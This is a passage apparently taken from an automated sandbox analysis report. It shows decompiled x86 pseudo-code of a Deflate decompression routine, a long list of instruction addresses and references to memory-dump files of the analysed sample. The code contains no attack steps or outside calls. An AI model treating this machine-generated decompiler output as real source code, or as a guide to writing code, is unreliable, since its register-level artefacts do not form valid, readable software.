											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x10;
												if(__ebx >= 0x10) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E0040585F( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E00406B2B( &(__esi[3]), __edi, 0x101, 0x4073fc, 0x40743c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E00406B2B(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40747c, 0x4074b8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                        0x00406354
                        0x00406354
                        0x00406354
                        0x00406354
                        0x00406354
                        0x00406358
                        0x00000000
                        0x00000000
                        0x0040635e
                        0x0040635e
                        0x00406361
                        0x00406364
                        0x00406369
                        0x0040636b
                        0x0040636e
                        0x00406371
                        0x00406374
                        0x00406374
                        0x00406377
                        0x00000000
                        0x00000000
                        0x00406379
                        0x00406379
                        0x0040637c
                        0x00406381
                        0x00406383
                        0x00406386
                        0x0040638c
                        0x004060eb
                        0x004060eb
                        0x004060ee
                        0x004060f4
                        0x004060fa
                        0x00406103
                        0x00406109
                        0x0040610c
                        0x00406113
                        0x00406118
                        0x0040611e
                        0x00406129
                        0x00406129
                        0x00406392
                        0x00406392
                        0x0040639c
                        0x00000000
                        0x00000000
                        0x004063a2
                        0x004063a2
                        0x004063a6
                        0x004063a9
                        0x004063a9
                        0x004063ad
                        0x004063b3
                        0x004063b3
                        0x004063b6
                        0x004063b9
                        0x004063bf
                        0x00000000
                        0x00000000
                        0x004063c1
                        0x004063e3
                        0x004063e3
                        0x004063e6
                        0x00000000
                        0x00000000
                        0x004063c3
                        0x004063c7
                        0x00000000
                        0x00000000
                        0x004063cd
                        0x004063cd
                        0x004063d0
                        0x004063d3
                        0x004063d8
                        0x004063da
                        0x004063dd
                        0x004063e0
                        0x004063e0
                        0x004063e8
                        0x004063e8
                        0x004063ee
                        0x004063f1
                        0x004063f4
                        0x004063f4
                        0x004063fb
                        0x004063ff
                        0x00406403
                        0x00406406
                        0x00406409
                        0x0040640f
                        0x00406414
                        0x00000000
                        0x00000000
                        0x00406416
                        0x0040642a
                        0x0040642a
                        0x0040642e
                        0x00000000
                        0x00000000
                        0x00406418
                        0x0040641b
                        0x0040641b
                        0x00406422
                        0x00406427
                        0x00406427
                        0x00406427
                        0x00406430
                        0x00406430
                        0x00406433
                        0x00406441
                        0x00406447
                        0x0040644c
                        0x00406452
                        0x00406458
                        0x0040645e
                        0x00406465
                        0x00406479
                        0x00406479
                        0x00406a48
                        0x00406a48
                        0x00406a48
                        0x00406a4d
                        0x00000000
                        0x00000000
                        0x00406085
                        0x00406085
                        0x00000000
                        0x00406680
                        0x00406680
                        0x00406684
                        0x00406687
                        0x0040668a
                        0x0040668d
                        0x00000000
                        0x00000000
                        0x00406693
                        0x00406693
                        0x004066b8
                        0x004066b8
                        0x004066b8
                        0x004066ba
                        0x00000000
                        0x00000000
                        0x00406698
                        0x00406698
                        0x0040669c
                        0x00000000
                        0x00000000
                        0x004066a2
                        0x004066a2
                        0x004066a5
                        0x004066a8
                        0x004066ab
                        0x004066ad
                        0x004066af
                        0x004066b2
                        0x004066b5
                        0x004066b5
                        0x004066b5
                        0x004066bc
                        0x004066bc
                        0x004066c4
                        0x004066c7
                        0x004066ca
                        0x004066cd
                        0x004066d1
                        0x004066d4
                        0x004066d6
                        0x004066d9
                        0x004066db
                        0x004066ef
                        0x004066ef
                        0x004066f2
                        0x0040670c
                        0x0040670c
                        0x0040670f
                        0x00000000
                        0x00000000
                        0x00406715
                        0x00406715
                        0x00406718
                        0x00000000
                        0x00000000
                        0x0040671e
                        0x0040671e
                        0x00000000
                        0x0040671e
                        0x004066f4
                        0x004066f7
                        0x004066fe
                        0x00406701
                        0x00000000
                        0x00406701
                        0x004066dd
                        0x004066e1
                        0x004066e4
                        0x00000000
                        0x00000000
                        0x00406729
                        0x00406729
                        0x0040674e
                        0x0040674e
                        0x0040674e
                        0x00406750
                        0x00000000
                        0x00000000
                        0x0040672e
                        0x0040672e
                        0x00406732
                        0x00000000
                        0x00000000
                        0x00406738
                        0x00406738
                        0x0040673b
                        0x0040673e
                        0x00406741
                        0x00406743
                        0x00406745
                        0x00406748
                        0x0040674b
                        0x0040674b
                        0x0040674b
                        0x00406752
                        0x0040675a
                        0x0040675d
                        0x00406760
                        0x00406762
                        0x00406765
                        0x00406765
                        0x00406767
                        0x0040676b
                        0x0040676e
                        0x00406771
                        0x00406774
                        0x00000000
                        0x00000000
                        0x0040677a
                        0x0040677a
                        0x0040679f
                        0x0040679f
                        0x0040679f
                        0x004067a1
                        0x00000000
                        0x00000000
                        0x0040677f
                        0x0040677f
                        0x00406783
                        0x00000000
                        0x00000000
                        0x00406789
                        0x00406789
                        0x0040678c
                        0x0040678f
                        0x00406792
                        0x00406794
                        0x00406796
                        0x00406799
                        0x0040679c
                        0x0040679c
                        0x0040679c
                        0x004067a3
                        0x004067a3
                        0x004067ab
                        0x004067ae
                        0x004067b1
                        0x004067b4
                        0x004067b8
                        0x004067bb
                        0x004067bd
                        0x004067c0
                        0x004067c3
                        0x004067dd
                        0x004067dd
                        0x004067e0
                        0x00000000
                        0x00000000
                        0x004067e6
                        0x004067e6
                        0x004067e9
                        0x004067f0
                        0x00000000
                        0x004067f0
                        0x004067c5
                        0x004067c8
                        0x004067cf
                        0x004067d2
                        0x00000000
                        0x00000000
                        0x004067f8
                        0x004067f8
                        0x0040681d
                        0x0040681d
                        0x0040681d
                        0x0040681f
                        0x00000000
                        0x00000000
                        0x004067fd
                        0x004067fd
                        0x00406801
                        0x00000000
                        0x00000000
                        0x00406807
                        0x00406807
                        0x0040680a
                        0x0040680d
                        0x00406810
                        0x00406812
                        0x00406814
                        0x00406817
                        0x0040681a
                        0x0040681a
                        0x0040681a
                        0x00406821
                        0x00406829
                        0x0040682c
                        0x0040682f
                        0x00406831
                        0x00406834
                        0x00406834
                        0x00406836
                        0x00000000
                        0x00000000
                        0x0040683c
                        0x0040683c
                        0x0040683f
                        0x00406844
                        0x00406846
                        0x0040684c
                        0x0040684e
                        0x00406863
                        0x00406865
                        0x00406865
                        0x00406850
                        0x00406856
                        0x00406858
                        0x0040685a
                        0x0040685a
                        0x00406867
                        0x0040686b
                        0x0040686e
                        0x00406874
                        0x00406874
                        0x00406877
                        0x00406877
                        0x00406877
                        0x00406879
                        0x00000000
                        0x00000000
                        0x0040687f
                        0x0040687f
                        0x00406885
                        0x00406887
                        0x004068ac
                        0x004068af
                        0x004068b5
                        0x004068ba
                        0x004068c0
                        0x004068c6
                        0x004068c8
                        0x004068cb
                        0x004068d4
                        0x004068da
                        0x004068da
                        0x004068cd
                        0x004068cf
                        0x004068d1
                        0x004068d1
                        0x004068dc
                        0x004068e2
                        0x004068e4
                        0x004068e7
                        0x004068e9
                        0x004068ef
                        0x004068f1
                        0x004068f3
                        0x004068f5
                        0x004068f7
                        0x004068fa
                        0x00406903
                        0x00406906
                        0x00406906
                        0x004068fc
                        0x004068fc
                        0x004068ff
                        0x004068ff
                        0x004068fa
                        0x004068f1
                        0x00406908
                        0x0040690a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040690a
                        0x00406889
                        0x00406889
                        0x0040688f
                        0x00406895
                        0x00406897
                        0x00000000
                        0x00000000
                        0x00406899
                        0x00406899
                        0x0040689b
                        0x0040689d
                        0x004068a6
                        0x004068a6
                        0x0040689f
                        0x0040689f
                        0x004068a2
                        0x004068a2
                        0x004068a8
                        0x004068aa
                        0x00000000
                        0x00000000
                        0x00406910
                        0x00406910
                        0x00406915
                        0x00406917
                        0x00406918
                        0x00406919
                        0x0040691a
                        0x00406920
                        0x00406923
                        0x00406926
                        0x00406929
                        0x0040692b
                        0x00406931
                        0x00406931
                        0x00406934
                        0x00406934
                        0x00406934
                        0x00406934
                        0x0040693d
                        0x00000000
                        0x00000000
                        0x00406942
                        0x00406942
                        0x00406945
                        0x00406948
                        0x0040694a
                        0x004069e1
                        0x004069e1
                        0x004069e4
                        0x004069e6
                        0x004069e7
                        0x004069e8
                        0x004069eb
                        0x00000000
                        0x004069eb
                        0x00406950
                        0x00406950
                        0x00406956
                        0x00406958
                        0x0040697d
                        0x00406980
                        0x00406986
                        0x0040698b
                        0x00406991
                        0x00406997
                        0x00406999
                        0x0040699c
                        0x004069a5
                        0x004069ab
                        0x004069ab
                        0x0040699e
                        0x004069a0
                        0x004069a2
                        0x004069a2
                        0x004069ad
                        0x004069b3
                        0x004069b5
                        0x004069b8
                        0x004069ba
                        0x004069c0
                        0x004069c2
                        0x004069c4
                        0x004069c6
                        0x004069c8
                        0x004069cb
                        0x004069d4
                        0x004069d7
                        0x004069d7
                        0x004069cd
                        0x004069cd
                        0x004069d0
                        0x004069d0
                        0x004069cb
                        0x004069c2
                        0x004069d9
                        0x004069db
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004069db
                        0x0040695a
                        0x0040695a
                        0x00406960
                        0x00406966
                        0x00406968
                        0x00000000
                        0x00000000
                        0x0040696a
                        0x0040696a
                        0x0040696c
                        0x0040696e
                        0x00406975
                        0x00406975
                        0x00406977
                        0x00406970
                        0x00406970
                        0x00406972
                        0x00406972
                        0x00406979
                        0x0040697b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004069f3
                        0x004069f3
                        0x004069f6
                        0x004069f8
                        0x004069fb
                        0x004069fe
                        0x004069fe
                        0x004069fe
                        0x004069fe
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004060ac
                        0x00406090
                        0x00000000
                        0x00406096
                        0x00406099
                        0x004060a3
                        0x004060a6
                        0x004060a9
                        0x00000000
                        0x004060a9
                        0x00406090
                        0x004060b4
                        0x004060b7
                        0x004060bb
                        0x004060c5
                        0x004060cf
                        0x004060d2
                        0x004060d8
                        0x0040620c
                        0x0040620e
                        0x00406214
                        0x00406217
                        0x0040621a
                        0x00000000
                        0x0040621a
                        0x004060de
                        0x004060de
                        0x004060df
                        0x00406137
                        0x00406137
                        0x0040613e
                        0x004061e4
                        0x004061e4
                        0x004061e9
                        0x004061ec
                        0x004061f1
                        0x004061f4
                        0x004061f9
                        0x004061fc
                        0x00406201
                        0x00406204
                        0x00406204
                        0x00000000
                        0x00406144
                        0x00406144
                        0x00406144
                        0x00406144
                        0x00406148
                        0x00406148
                        0x0040616a
                        0x0040616d
                        0x0040616f
                        0x00406172
                        0x00406177
                        0x0040614d
                        0x0040614d
                        0x00406152
                        0x00406154
                        0x00406156
                        0x0040615b
                        0x00406161
                        0x00406166
                        0x00406168
                        0x00406168
                        0x0040615d
                        0x0040615d
                        0x0040615d
                        0x0040615b
                        0x00000000
                        0x00406179
                        0x004061a6
                        0x004061ab
                        0x004061ad
                        0x004061ae
                        0x004061b0
                        0x004061b1
                        0x004061b1
                        0x004061b1
                        0x004061d9
                        0x004061de
                        0x004061de
                        0x00000000
                        0x004061de
                        0x00406177
                        0x0040613e
                        0x004060e1
                        0x004060e1
                        0x004060e2
                        0x0040612c
                        0x00000000
                        0x0040612c
                        0x004060e4
                        0x004060e5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406241
                        0x00406241
                        0x00406241
                        0x00406244
                        0x00000000
                        0x00000000
                        0x00406221
                        0x00406221
                        0x00406225
                        0x00000000
                        0x00000000
                        0x0040622b
                        0x0040622b
                        0x0040622e
                        0x00406231
                        0x00406236
                        0x00406238
                        0x0040623b
                        0x0040623e
                        0x0040623e
                        0x0040623e
                        0x00406246
                        0x00406246
                        0x00406249
                        0x0040624b
                        0x00406250
                        0x00406253
                        0x00406255
                        0x00406258
                        0x00000000
                        0x00000000
                        0x0040625e
                        0x0040625e
                        0x00406260
                        0x00000000
                        0x00000000
                        0x00406266
                        0x00406266
                        0x0040626a
                        0x00000000
                        0x00000000
                        0x00406270
                        0x00406270
                        0x00406273
                        0x00406275
                        0x00406313
                        0x00406313
                        0x00406316
                        0x00406318
                        0x00406318
                        0x0040631b
                        0x0040631e
                        0x00406320
                        0x00406322
                        0x00406324
                        0x00406324
                        0x0040632d
                        0x00406332
                        0x00406335
                        0x00406338
                        0x0040633b
                        0x0040633e
                        0x0040633e
                        0x0040633e
                        0x00406341
                        0x00406347
                        0x00406347
                        0x0040634d
                        0x0040634d
                        0x0040634d
                        0x00000000
                        0x00406341
                        0x0040627b
                        0x0040627b
                        0x00406281
                        0x00406284
                        0x00406286
                        0x004062b1
                        0x004062b4
                        0x004062ba
                        0x004062bf
                        0x004062c5
                        0x004062cb
                        0x004062cd
                        0x004062d0
                        0x004062d9
                        0x004062df
                        0x004062df
                        0x004062d2
                        0x004062d4
                        0x004062d6
                        0x004062d6
                        0x004062e1
                        0x004062e7
                        0x004062ea
                        0x004062ec
                        0x004062ee
                        0x004062f4
                        0x004062f6
                        0x004062f8
                        0x004062fb
                        0x00406304
                        0x00406304
                        0x00406306
                        0x004062fd
                        0x004062fd
                        0x00406300
                        0x00406300
                        0x00406308
                        0x00406308
                        0x004062f6
                        0x0040630b
                        0x0040630d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040630d
                        0x00406288
                        0x00406288
                        0x0040628e
                        0x00406294
                        0x00406296
                        0x00000000
                        0x00000000
                        0x00406298
                        0x00406298
                        0x0040629a
                        0x0040629c
                        0x0040629f
                        0x004062a6
                        0x004062a6
                        0x004062a8
                        0x004062a1
                        0x004062a1
                        0x004062a3
                        0x004062a3
                        0x004062aa
                        0x004062ac
                        0x004062af
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004063b3
                        0x004063b6
                        0x004063b9
                        0x004063bf
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406596
                        0x00406596
                        0x00406596
                        0x00406599
                        0x0040659c
                        0x0040659e
                        0x004065a1
                        0x004065a7
                        0x004065ae
                        0x004065b0
                        0x00000000
                        0x00000000
                        0x00406484
                        0x00406484
                        0x004064ac
                        0x004064ac
                        0x004064ac
                        0x004064ae
                        0x00000000
                        0x00000000
                        0x0040648c
                        0x0040648c
                        0x00406490
                        0x00000000
                        0x00000000
                        0x00406496
                        0x00406496
                        0x00406499
                        0x0040649c
                        0x0040649f
                        0x004064a1
                        0x004064a3
                        0x004064a6
                        0x004064a9
                        0x004064a9
                        0x004064a9
                        0x004064b0
                        0x004064b0
                        0x004064b8
                        0x004064bb
                        0x004064c1
                        0x004064c4
                        0x004064c8
                        0x004064cc
                        0x004064cf
                        0x004064d2
                        0x004064ea
                        0x004064ea
                        0x004064ed
                        0x004064fb
                        0x004064fe
                        0x004064ef
                        0x004064ef
                        0x004064f1
                        0x004064f8
                        0x004064f8
                        0x00406527
                        0x00406527
                        0x00406527
                        0x0040652a
                        0x0040652c
                        0x00000000
                        0x00000000
                        0x00406507
                        0x00406507
                        0x0040650b
                        0x00000000
                        0x00000000
                        0x00406511
                        0x00406511
                        0x00406514
                        0x00406517
                        0x0040651a
                        0x0040651c
                        0x0040651e
                        0x00406521
                        0x00406524
                        0x00406524
                        0x00406524
                        0x0040652e
                        0x0040652e
                        0x00406530
                        0x00406532
                        0x0040653d
                        0x00406540
                        0x00406543
                        0x00406545
                        0x00406547
                        0x00406549
                        0x0040654c
                        0x0040654f
                        0x00406554
                        0x00406557
                        0x0040655a
                        0x0040655d
                        0x00406564
                        0x00406567
                        0x00406569
                        0x00000000
                        0x00000000
                        0x0040656f
                        0x0040656f
                        0x00406573
                        0x00406584
                        0x00406584
                        0x00406584
                        0x00406586
                        0x00406586
                        0x0040658a
                        0x0040658a
                        0x0040658a
                        0x0040658c
                        0x0040658d
                        0x00406590
                        0x00406590
                        0x00406590
                        0x00406593
                        0x00000000
                        0x00406593
                        0x00406575
                        0x00406575
                        0x00406578
                        0x00000000
                        0x00000000
                        0x0040657e
                        0x0040657e
                        0x00000000
                        0x0040657e
                        0x004064d4
                        0x004064d4
                        0x004064d6
                        0x004064d8
                        0x004064db
                        0x004064de
                        0x004064e2
                        0x004064e2
                        0x004065b6
                        0x004065b6
                        0x004065b9
                        0x004065c0
                        0x004065c4
                        0x004065c6
                        0x004065c9
                        0x004065cc
                        0x004065d1
                        0x004065d4
                        0x004065d6
                        0x004065d7
                        0x004065da
                        0x004065e5
                        0x004065e8
                        0x004065ff
                        0x00406604
                        0x0040660b
                        0x00406610
                        0x00406614
                        0x00406616
                        0x00406616
                        0x00406616
                        0x00406619
                        0x0040661b
                        0x00000000
                        0x00406621
                        0x00406621
                        0x00406625
                        0x00406630
                        0x00406643
                        0x00406648
                        0x0040664d
                        0x0040664f
                        0x00000000
                        0x00000000
                        0x00406655
                        0x00406655
                        0x00406658
                        0x0040665a
                        0x00406668
                        0x00406668
                        0x0040666b
                        0x0040666b
                        0x0040666e
                        0x00406671
                        0x00406674
                        0x00406677
                        0x0040667a
                        0x0040667d
                        0x00000000
                        0x0040667d
                        0x0040665c
                        0x0040665c
                        0x00406662
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406662
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406a01
                        0x00406a01
                        0x00406a07
                        0x00406a0d
                        0x00406a12
                        0x00406a18
                        0x00406a1e
                        0x00406a20
                        0x00406a23
                        0x00406a2c
                        0x00406a32
                        0x00406a32
                        0x00406a25
                        0x00406a27
                        0x00406a29
                        0x00406a29
                        0x00406a34
                        0x00406a36
                        0x00406a39
                        0x00406a74
                        0x00406a74
                        0x00000000
                        0x00406a3b
                        0x00406a3b
                        0x00406a3b
                        0x00406a41
                        0x00406a44
                        0x00406a46
                        0x00406a7b
                        0x00406a7d
                        0x00000000
                        0x00406a7d
                        0x00000000
                        0x00406a46
                        0x00000000
                        0x00406085
                        0x00406a53
                        0x00000000
                        0x00406a53
                        0x00406467
                        0x00406469
                        0x00000000
                        0x00000000
                        0x0040646b
                        0x0040646b
                        0x0040646e
                        0x00000000
                        0x0040646e
                        0x004063b3
                        0x00406374
                        0x00406a58
                        0x00406a5b
                        0x00406a5d
                        0x00406a66
                        0x00406a6c
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
